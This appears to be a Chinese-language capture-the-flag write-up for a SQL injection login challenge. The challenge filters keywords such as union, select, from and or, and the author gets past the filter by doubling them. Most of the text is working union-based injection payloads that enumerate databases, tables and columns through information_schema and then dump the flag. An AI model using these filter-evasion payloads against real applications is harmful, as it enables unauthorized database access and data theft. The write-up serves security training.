考点:
1、双写绕过
2、过滤测试
先试一下万能密码,密码错误,其他啥显示都没有
换个地方闭合
看到报错地点少了个or,再试试其他关键字
order by 变成了der,还有union,select也看不见,说明过滤了一些关键词,试一下双写绕过
o没了,不知道是不是过滤了o,换个方式,用联合查询的方式
发现显示位2,3
开始爆库
发现ctf库
?username=admin&password=123 ' ununionion seselectlect 1,2,group_concat(schema_name) frfromom
infoorrmation_schema.schemata --+
Flag表
?username=admin&password=123 ' ununionion seselectlect 1,2,group_concat(table_name) frfromom
infoorrmation_schema.tables whwhereere table_schema="ctf" --+
字段名flag
?username=admin&password=123 ' ununionion seselectlect 1,2,group_concat(column_name) frfromom
infoorrmation_schema.columns whwhereere table_name="Flag" --+
查数据
?username=admin&password=123 ' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag --+